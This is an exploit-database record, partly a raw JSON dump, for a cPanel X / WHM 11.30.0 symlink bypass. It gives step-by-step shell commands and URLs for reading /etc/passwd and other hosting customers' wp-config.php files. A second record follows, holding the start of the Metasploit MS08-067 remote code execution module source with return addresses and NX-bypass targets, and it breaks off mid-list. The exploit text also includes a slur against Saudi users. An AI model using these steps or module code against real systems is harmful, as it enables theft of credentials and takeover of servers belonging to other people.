ID 1337DAY-ID-16304 Type zdt Reporter ZxH-Labs Modified 2011-06-11T00:00:00
Description
Exploit for php platform in category web applications
# cPanel X / WHM 11.30.0 (build 27) Read Files / Symlinks Bypass !!
# Version : 11.30.0 <Build 27>
# Author : ZxH-Labs
# Date : 1st OF Jun 2011
# Tested On CentOS
# Software Link : http://www.cpanel.net
# Home: 1337day.com Inj3ct0r Exploit DataBase
[+] Exploiting cPanel x ....
At First , You Must've Reseller Account < Note : We'll Not Need To 2086 Port :)
Okay Now Open SSH or File Manager Then Go to
/home/user/cpanelbranding/x3
Note : You Can Change x3 Template To Template That You're Running
Okay Now Exeute This Command To Delete File And Make Symlink To read it
# 0x01 : [email protected] [~/cpanelbranding/x3]# rm ui_sprites_bg_snap_to_smallest_width.png
# 0x02 : [email protected] [~/cpanelbranding/x3]# ln -s /etc/passwd ui_sprites_bg_snap_to_smallest_width.png
The Second Will Work Successfuly Without Any Problem'z !
Okay .. Now If You Want to Read Another File .. So You've To Check Files If You can Read it or No
So .. Execute This Command :
# 0x021 : [email protected] [~/]# ls -dl /home/*/public_html/ | grep drwxr-xr-x
You'll Get Some Path'z .. So You Can Read it Easily
# 0x03 : [email protected] [~/cpanelbranding/x3]# ln -s /home/user/public_html/wp-config.php sprites_bg_snap_to_smallest_width.png
Note : /home/user/public_html Must be Chmoded 755 / drwxr-xr-x
[+] Reading Data From cPanel X ...
Okay .. We've Finished The First Part .. Now We Want To Read Files / Symlinks !
Okay Now Go 2 cPanel X
# 0x01 : http://domain.com/net/..etc:2082
# 0x02 : http://ip:2082
# 0x03 : https://domain.com/net/..etc:2082
# 0x04 : https://ip:2082
Now Show Source And Search About "ui_sprites_bg_snap_to_smallest_width.png"
You'll See This
"("/cPanel_magic_revision_17975625280.1848/branding/x3/ui_sprites_bg_snap_to_smallest_width.png");}#ui-aqua-hd-bg{background-position:"
Now Add The Path To Your cPanel To Get File
[+] Full Exploit of cPanel X ...
Now You'll Open This Link
# 0x01 : http://domain.com/net/..etc:2082//cPanel_magic_revision_17975625280.1848/branding/x3/ui_sprites_bg_snap_to_smallest_width.png
# 0x02 : http://ip:2082//cPanel_magic_revision_17975625280.1848/branding/x3/ui_sprites_bg_snap_to_smallest_width.png
# 0x03 : https://domain.com/net/..etc:2082//cPanel_magic_revision_17975625280.1848/branding/x3/ui_sprites_bg_snap_to_smallest_width.png
# 0x04 : https://ip:2082//cPanel_magic_revision_17975625280.1848/branding/x3/ui_sprites_bg_snap_to_smallest_width.png
[+] Note For All
We All Have More And More exploits For cPanel X But I Want You 2 Know That All exploit'z Will Not bypass Forbidden .. Only if file has 755 Permission
However I Hate Lamer'z :) .. Especially Saudi'z Lamer'z !
./b0x-j0
[+] Greet'z 2 All Friend'z and 1337day.com (Inj3ct0r Team)
# 0day.today [2018-01-01] #
{"hash": "606bd01f3f9dc175e6e2d093b5d37c42cec827f1d4caec59b757d0d644e44d79", "id": "1337DAY-ID-16304", "lastseen": "2018-01-01T09:12:36", "viewCount": 4, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "ef50bdf77f5c5c3fac601c22cd80135e", "key": "href"}, {"hash": "b4760f6282eb08cdd1cadfa8bb6b08ad", "key": "modified"}, {"hash": "b4760f6282eb08cdd1cadfa8bb6b08ad", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "158112d00a788f02b7c69cbbfa6aefb1", "key": "reporter"}, {"hash": "e6583e5dc0f387c5d7d78cb2a7003572", "key": "sourceData"}, {"hash": "0717ed3f5f6a24c809d264952ec23a2c", "key": "sourceHref"}, {"hash": "5144edf7e7aa194e068326d9a7574770", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": -0.4, "vector": "NONE", "modified": "2018-01-01T09:12:36"}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-13319", "1337DAY-ID-2086", "1337DAY-ID-2082"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:7357", "SECURITYVULNS:DOC:16304"]}], "modified": "2018-01-01T09:12:36"}, "vulnersScore": -0.4}, "type": "zdt", "sourceHref": "https://0day.today/exploit/16304", "description": "Exploit for php platform in category web applications", "title": "cPanel X / WHM 11.30.0 (build 27) Read Files / Symlinks Bypass", "history": [{"bulletin": {"hash": "5fc17f91b3635886830f656a25d24d9288df331c10c0c8e8f16695e09245239a", "id": "1337DAY-ID-16304", "lastseen": "2016-04-20T01:07:46", "enchantments": {"score": {"value": 5.5, "modified": "2016-04-20T01:07:46"}}, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "158112d00a788f02b7c69cbbfa6aefb1", "key": "reporter"}, {"hash": "b4760f6282eb08cdd1cadfa8bb6b08ad", "key": "published"}, {"hash": "d882e0bbdb267aed8726ff55f8bf56e0", "key": "href"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "eabd9a7754c94655a9d28616b165d61d", "key": "sourceData"}, {"hash": "5144edf7e7aa194e068326d9a7574770", "key": "title"}, {"hash": "5b49f2164ef181b5fd4edaf602632bbf", "key": "sourceHref"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "b4760f6282eb08cdd1cadfa8bb6b08ad", "key": "modified"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/16304", "description": "Exploit for php platform in category web applications", "viewCount": 0, "title": "cPanel X / WHM 11.30.0 (build 27) Read Files / Symlinks Bypass", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "# cPanel X / WHM 11.30.0 (build 27) Read Files / Symlinks Bypass !!\r\n# Version : 11.30.0 <Build 27>\r\n# Author : ZxH-Labs\r\n# Date : 1st OF Jun 2011\r\n# Tested On CentOS \r\n# Software Link : http://www.cpanel.net\r\n# Home: 1337day.com Inj3ct0r Exploit DataBase\r\n\r\n[+] Exploiting cPanel x .... \r\n\r\nAt First , You Must've Reseller Account < Note : We'll Not Need To 2086 Port :)\r\nOkay Now Open SSH or File Manager Then Go to\r\n \r\n /home/user/cpanelbranding/x3\r\n\r\n\r\nNote : You Can Change x3 Template To Template That You're Running \r\nOkay Now Exeute This Command To Delete File And Make Symlink To read it \r\n\r\n# 0x01 : z1d@dns.j0 [~/cpanelbranding/x3]# rm ui_sprites_bg_snap_to_smallest_width.png\r\n# 0x02 : z1d@dns.j0 [~/cpanelbranding/x3]# ln -s /etc/passwd ui_sprites_bg_snap_to_smallest_width.png\r\n\r\nThe Second Will Work Successfuly Without Any Problem'z !\r\nOkay .. Now If You Want to Read Another File .. So You've To Check Files If You can Read it or No \r\nSo .. Execute This Command :\r\n\r\n# 0x021 : z1d@dns.j0 [~/]# ls -dl /home/*/public_html/ | grep drwxr-xr-x\r\n\r\nYou'll Get Some Path'z .. So You Can Read it Easily \r\n\r\n# 0x03 : z1d@dns.j0 [~/cpanelbranding/x3]# ln -s /home/user/public_html/wp-config.php sprites_bg_snap_to_smallest_width.png\r\nNote : /home/user/public_html Must be Chmoded 755 / drwxr-xr-x\r\n\r\n[+] Reading Data From cPanel X ...\r\n\r\nOkay .. We've Finished The First Part .. Now We Want To Read Files / Symlinks !\r\nOkay Now Go 2 cPanel X \r\n\r\n# 0x01 : http://domain.com/net/..etc:2082\r\n# 0x02 : http://ip:2082\r\n# 0x03 : https://domain.com/net/..etc:2082\r\n# 0x04 : https://ip:2082\r\n\r\nNow Show Source And Search About \"ui_sprites_bg_snap_to_smallest_width.png\" \r\nYou'll See This\r\n\"(\"/cPanel_magic_revision_17975625280.1848/branding/x3/ui_sprites_bg_snap_to_smallest_width.png\");}#ui-aqua-hd-bg{background-position:\"\r\nNow Add The Path To Your cPanel To Get File\r\n\r\n[+] Full Exploit of cPanel X ...\r\n\r\nNow You'll Open This Link\r\n\r\n# 0x01 : http://domain.com/net/..etc:2082//cPanel_magic_revision_17975625280.1848/branding/x3/ui_sprites_bg_snap_to_smallest_width.png\r\n# 0x02 : http://ip:2082//cPanel_magic_revision_17975625280.1848/branding/x3/ui_sprites_bg_snap_to_smallest_width.png\r\n# 0x03 : https://domain.com/net/..etc:2082//cPanel_magic_revision_17975625280.1848/branding/x3/ui_sprites_bg_snap_to_smallest_width.png\r\n# 0x04 : https://ip:2082//cPanel_magic_revision_17975625280.1848/branding/x3/ui_sprites_bg_snap_to_smallest_width.png\r\n\r\n\r\n[+] Note For All \r\n\r\nWe All Have More And More exploits For cPanel X But I Want You 2 Know That All exploit'z Will Not bypass Forbidden .. Only if file has 755 Permission \r\nHowever I Hate Lamer'z :) .. Especially Saudi'z Lamer'z !\r\n\r\n./b0x-j0\r\n\r\n[+] Greet'z 2 All Friend'z and 1337day.com (Inj3ct0r Team)\r\n\r\n\n\n# 0day.today [2016-04-20] #", "published": "2011-06-11T00:00:00", "references": [], "reporter": "ZxH-Labs", "modified": "2011-06-11T00:00:00", "href": "http://0day.today/exploit/description/16304"}, "lastseen": "2016-04-20T01:07:46", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "# cPanel X / WHM 11.30.0 (build 27) Read Files / Symlinks Bypass !!\r\n# Version : 11.30.0 <Build 27>\r\n# Author : ZxH-Labs\r\n# Date : 1st OF Jun 2011\r\n# Tested On CentOS \r\n# Software Link : http://www.cpanel.net\r\n# Home: 1337day.com Inj3ct0r Exploit DataBase\r\n\r\n[+] Exploiting cPanel x .... \r\n\r\nAt First , You Must've Reseller Account < Note : We'll Not Need To 2086 Port :)\r\nOkay Now Open SSH or File Manager Then Go to\r\n \r\n /home/user/cpanelbranding/x3\r\n\r\n\r\nNote : You Can Change x3 Template To Template That You're Running \r\nOkay Now Exeute This Command To Delete File And Make Symlink To read it \r\n\r\n# 0x01 : [email\u00a0protected] [~/cpanelbranding/x3]# rm ui_sprites_bg_snap_to_smallest_width.png\r\n# 0x02 : [email\u00a0protected] [~/cpanelbranding/x3]# ln -s /etc/passwd ui_sprites_bg_snap_to_smallest_width.png\r\n\r\nThe Second Will Work Successfuly Without Any Problem'z !\r\nOkay .. Now If You Want to Read Another File .. So You've To Check Files If You can Read it or No \r\nSo .. Execute This Command :\r\n\r\n# 0x021 : [email\u00a0protected] [~/]# ls -dl /home/*/public_html/ | grep drwxr-xr-x\r\n\r\nYou'll Get Some Path'z .. So You Can Read it Easily \r\n\r\n# 0x03 : [email\u00a0protected] [~/cpanelbranding/x3]# ln -s /home/user/public_html/wp-config.php sprites_bg_snap_to_smallest_width.png\r\nNote : /home/user/public_html Must be Chmoded 755 / drwxr-xr-x\r\n\r\n[+] Reading Data From cPanel X ...\r\n\r\nOkay .. We've Finished The First Part .. Now We Want To Read Files / Symlinks !\r\nOkay Now Go 2 cPanel X \r\n\r\n# 0x01 : http://domain.com/net/..etc:2082\r\n# 0x02 : http://ip:2082\r\n# 0x03 : https://domain.com/net/..etc:2082\r\n# 0x04 : https://ip:2082\r\n\r\nNow Show Source And Search About \"ui_sprites_bg_snap_to_smallest_width.png\" \r\nYou'll See This\r\n\"(\"/cPanel_magic_revision_17975625280.1848/branding/x3/ui_sprites_bg_snap_to_smallest_width.png\");}#ui-aqua-hd-bg{background-position:\"\r\nNow Add The Path To Your cPanel To Get File\r\n\r\n[+] Full Exploit of cPanel X ...\r\n\r\nNow You'll Open This Link\r\n\r\n# 0x01 : http://domain.com/net/..etc:2082//cPanel_magic_revision_17975625280.1848/branding/x3/ui_sprites_bg_snap_to_smallest_width.png\r\n# 0x02 : http://ip:2082//cPanel_magic_revision_17975625280.1848/branding/x3/ui_sprites_bg_snap_to_smallest_width.png\r\n# 0x03 : https://domain.com/net/..etc:2082//cPanel_magic_revision_17975625280.1848/branding/x3/ui_sprites_bg_snap_to_smallest_width.png\r\n# 0x04 : https://ip:2082//cPanel_magic_revision_17975625280.1848/branding/x3/ui_sprites_bg_snap_to_smallest_width.png\r\n\r\n\r\n[+] Note For All \r\n\r\nWe All Have More And More exploits For cPanel X But I Want You 2 Know That All exploit'z Will Not bypass Forbidden .. Only if file has 755 Permission \r\nHowever I Hate Lamer'z :) .. Especially Saudi'z Lamer'z !\r\n\r\n./b0x-j0\r\n\r\n[+] Greet'z 2 All Friend'z and 1337day.com (Inj3ct0r Team)\r\n\r\n\n\n# 0day.today [2018-01-01] #", "published": "2011-06-11T00:00:00", "references": [], "reporter": "ZxH-Labs", "modified": "2011-06-11T00:00:00", "href": "https://0day.today/exploit/description/16304"}
{"metasploit": [{"lastseen": "2019-11-29T11:18:50", "bulletinFamily": "exploit", "description": "This module exploits a parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service. This module is capable of bypassing NX on some operating systems and service packs. The correct target must be used to prevent the Server Service (along with a dozen others in the same process) from crashing. Windows XP targets seem to handle multiple successful exploitation events, but 2003 targets will often crash or hang on subsequent attempts. This is just the first version of this module, full support for NX bypass on 2003, along with other platforms, is still in development.\n", "modified": "2017-07-24T13:26:21", "published": "2012-06-19T17:59:15", "id": "MSF:EXPLOIT/WINDOWS/SMB/MS08_067_NETAPI", "href": "", "type": "metasploit", "title": "MS08-067 Microsoft Server Service Relative Path Stack Corruption", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::DCERPC\n include Msf::Exploit::Remote::SMB::Client\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MS08-067 Microsoft Server Service Relative Path Stack Corruption',\n 'Description' => %q{\n This module exploits a parsing flaw in the path canonicalization code of\n NetAPI32.dll through the Server Service. This module is capable of bypassing\n NX on some operating systems and service packs. The correct target must be\n used to prevent the Server Service (along with a dozen others in the same\n process) from crashing. Windows XP targets seem to handle multiple successful\n exploitation events, but 2003 targets will often crash or hang on subsequent\n attempts. This is just the first version of this module, full support for\n NX bypass on 2003, along with other platforms, is still in development.\n },\n 'Author' =>\n [\n 'hdm', # with tons of input/help/testing from the community\n 'Brett Moore <brett.moore[at]insomniasec.com>',\n 'frank2 <frank2[at]dc949.org>', # check() detection\n 'jduck', # XP SP2/SP3 AlwaysOn DEP bypass\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n %w(CVE 2008-4250),\n %w(OSVDB 49243),\n %w(MSB MS08-067),\n # If this vulnerability is found, ms08-67 is exposed as well\n ['URL', 'http://www.rapid7.com/vulndb/lookup/dcerpc-ms-netapi-netpathcanonicalize-dos']\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n },\n 'Privileged' => true,\n 'Payload' =>\n {\n 'Space' => 408,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x5c\\x5f\\x2f\\x2e\\x40\",\n 'Prepend' => \"\\x81\\xE4\\xF0\\xFF\\xFF\\xFF\", # stack alignment\n 'StackAdjustment' => -3500,\n\n },\n 'Platform' => 'win',\n 'DefaultTarget' => 0,\n 'Targets' =>\n [\n #\n # Automatic targetting via fingerprinting\n #\n ['Automatic Targeting', { 'auto' => true }],\n\n #\n # UNIVERSAL TARGETS\n #\n\n #\n # Antoine's universal for Windows 2000\n # Warning: DO NOT CHANGE THE OFFSET OF THIS TARGET\n #\n ['Windows 2000 Universal',\n {\n 'Ret' => 0x001f1cb0,\n 'Scratch' => 0x00020408,\n }\n ], # JMP EDI SVCHOST.EXE\n\n #\n # Standard return-to-ESI without NX bypass\n # Warning: DO NOT CHANGE THE OFFSET OF THIS TARGET\n #\n ['Windows XP SP0/SP1 Universal',\n {\n 'Ret' => 0x01001361,\n 'Scratch' => 0x00020408,\n }\n ], # JMP ESI SVCHOST.EXE\n\n # Standard return-to-ESI without NX bypass\n ['Windows 2003 SP0 Universal',\n {\n 'Ret' => 0x0100129e,\n 'Scratch' => 0x00020408,\n }\n ], # JMP ESI SVCHOST.EXE\n\n #\n # ENGLISH TARGETS\n #\n\n # jduck's AlwaysOn NX Bypass for XP SP2\n ['Windows XP SP2 English (AlwaysOn NX)',\n {\n # No pivot is needed, we drop into our rop\n 'Scratch' => 0x00020408,\n 'UseROP' => '5.1.2600.2180'\n }\n ],\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP2 English (NX)',\n {\n 'Ret' => 0x6f88f727,\n 'DisableNX' => 0x6f8916e2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # jduck's AlwaysOn NX Bypass for XP SP3\n ['Windows XP SP3 English (AlwaysOn NX)',\n {\n # No pivot is needed, we drop into our rop\n 'Scratch' => 0x00020408,\n 'UseROP' => '5.1.2600.5512'\n }\n ],\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP3 English (NX)',\n {\n 'Ret' => 0x6f88f807,\n 'DisableNX' => 0x6f8917c2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n #\n # NON-ENGLISH TARGETS - AUTOMATICALLY GENERATED\n #\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP2 Arabic (NX)',\n {\n 'Ret' => 0x6fd8f727,\n 'DisableNX' => 0x6fd916e2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP2 Chinese - Traditional / Taiwan (NX)',\n {\n 'Ret' => 0x5860f727,\n 'DisableNX' => 0x586116e2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP2 Chinese - Simplified (NX)',\n {\n 'Ret' => 0x58fbf727,\n 'DisableNX' => 0x58fc16e2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP2 Chinese - Traditional (NX)',\n {\n 'Ret' => 0x5860f727,\n 'DisableNX' => 0x586116e2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP2 Czech (NX)',\n {\n 'Ret' => 0x6fe1f727,\n 'DisableNX' => 0x6fe216e2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP2 Danish (NX)',\n {\n 'Ret' => 0x5978f727,\n 'DisableNX' => 0x597916e2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP2 German (NX)',\n {\n 'Ret' => 0x6fd9f727,\n 'DisableNX' => 0x6fda16e2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP2 Greek (NX)',\n {\n 'Ret' => 0x592af727,\n 'DisableNX' => 0x592b16e2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP2 Spanish (NX)',\n {\n 'Ret' => 0x6fdbf727,\n 'DisableNX' => 0x6fdc16e2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP2 Finnish (NX)',\n {\n 'Ret' => 0x597df727,\n 'DisableNX' => 0x597e16e2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP2 French (NX)',\n {\n 'Ret' => 0x595bf727,\n 'DisableNX' => 0x595c16e2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP2 Hebrew (NX)',\n {\n 'Ret' => 0x5940f727,\n 'DisableNX' => 0x594116e2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP2 Hungarian (NX)',\n {\n 'Ret' => 0x5970f727,\n 'DisableNX' => 0x597116e2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP2 Italian (NX)',\n {\n 'Ret' => 0x596bf727,\n 'DisableNX' => 0x596c16e2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP2 Japanese (NX)',\n {\n 'Ret' => 0x567fd3be,\n 'DisableNX' => 0x568016e2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP2 Korean (NX)',\n {\n 'Ret' => 0x6fd6f727,\n 'DisableNX' => 0x6fd716e2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP2 Dutch (NX)',\n {\n 'Ret' => 0x596cf727,\n 'DisableNX' => 0x596d16e2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP2 Norwegian (NX)',\n {\n 'Ret' => 0x597cf727,\n 'DisableNX' => 0x597d16e2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP2 Polish (NX)',\n {\n 'Ret' => 0x5941f727,\n 'DisableNX' => 0x594216e2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP2 Portuguese - Brazilian (NX)',\n {\n 'Ret' => 0x596ff727,\n 'DisableNX' => 0x597016e2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP2 Portuguese (NX)',\n {\n 'Ret' => 0x596bf727,\n 'DisableNX' => 0x596c16e2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP2 Russian (NX)',\n {\n 'Ret' => 0x6fe1f727,\n 'DisableNX' => 0x6fe216e2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP2 Swedish (NX)',\n {\n 'Ret' => 0x597af727,\n 'DisableNX' => 0x597b16e2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP2 Turkish (NX)',\n {\n 'Ret' => 0x5a78f727,\n 'DisableNX' => 0x5a7916e2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP3 Arabic (NX)',\n {\n 'Ret' => 0x6fd8f807,\n 'DisableNX' => 0x6fd917c2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP3 Chinese - Traditional / Taiwan (NX)',\n {\n 'Ret' => 0x5860f807,\n 'DisableNX' => 0x586117c2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP3 Chinese - Simplified (NX)',\n {\n 'Ret' => 0x58fbf807,\n 'DisableNX' => 0x58fc17c2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP3 Chinese - Traditional (NX)',\n {\n 'Ret' => 0x5860f807,\n 'DisableNX' => 0x586117c2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP3 Czech (NX)',\n {\n 'Ret' => 0x6fe1f807,\n 'DisableNX' => 0x6fe217c2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP3 Danish (NX)',\n {\n 'Ret' => 0x5978f807,\n 'DisableNX' => 0x597917c2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP3 German (NX)',\n {\n 'Ret' => 0x6fd9f807,\n 'DisableNX' => 0x6fda17c2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP3 Greek (NX)',\n {\n 'Ret' => 0x592af807,\n 'DisableNX' => 0x592b17c2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP3 Spanish (NX)',\n {\n 'Ret' => 0x6fdbf807,\n 'DisableNX' => 0x6fdc17c2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP3 Finnish (NX)',\n {\n 'Ret' => 0x597df807,\n 'DisableNX' => 0x597e17c2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP3 French (NX)',\n {\n 'Ret' => 0x595bf807,\n 'DisableNX' => 0x595c17c2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP3 Hebrew (NX)',\n {\n 'Ret' => 0x5940f807,\n 'DisableNX' => 0x594117c2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP3 Hungarian (NX)',\n {\n 'Ret' => 0x5970f807,\n 'DisableNX' => 0x597117c2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP3 Italian (NX)',\n {\n 'Ret' => 0x596bf807,\n 'DisableNX' => 0x596c17c2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP3 Japanese (NX)',\n {\n 'Ret' => 0x567fd4d2,\n 'DisableNX' => 0x568017c2,\n 'Scratch' => 0x00020408\n }\n ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\n # Metasploit's NX bypass for XP SP2/SP3\n ['Windows XP SP3 Korean (NX)',\n {\n 'Ret' => 0x6fd6f807,\n 